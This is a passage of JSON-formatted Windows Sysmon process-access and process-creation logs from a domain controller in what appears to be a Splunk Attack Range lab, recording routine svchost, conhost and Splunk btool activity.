C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3297,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-0010FE610500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-0010FE610500}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3298,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.258\r\nProcessGuid: {E2A3D6B1-1100-5F25-0000-0010BA620500}\r\nProcessId: 792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1100-5F25-0000-0010FE610500}\r\nParentProcessId: 2504\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.258","ProcessGuid":"{E2A3D6B1-1100-5F25-0000-0010BA620500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1100-5F25-0000-0010FE610500}","ParentProcessId":"2504","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3299,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-1100-5F25-0000-0010FE610500}\r\nSourceProcessId: 2504\r\nSourceThreadId: 2320\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-0010BA620500}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-1100-5F25-0000-0010FE610500}","SourceProcessId":"2504","SourceThreadId":"2320","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-0010BA620500}","TargetProcessId":"792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3300,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-0010BA620500}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-0010BA620500}","TargetProcessId":"792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3301,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3302,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3303,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3304,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3305,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 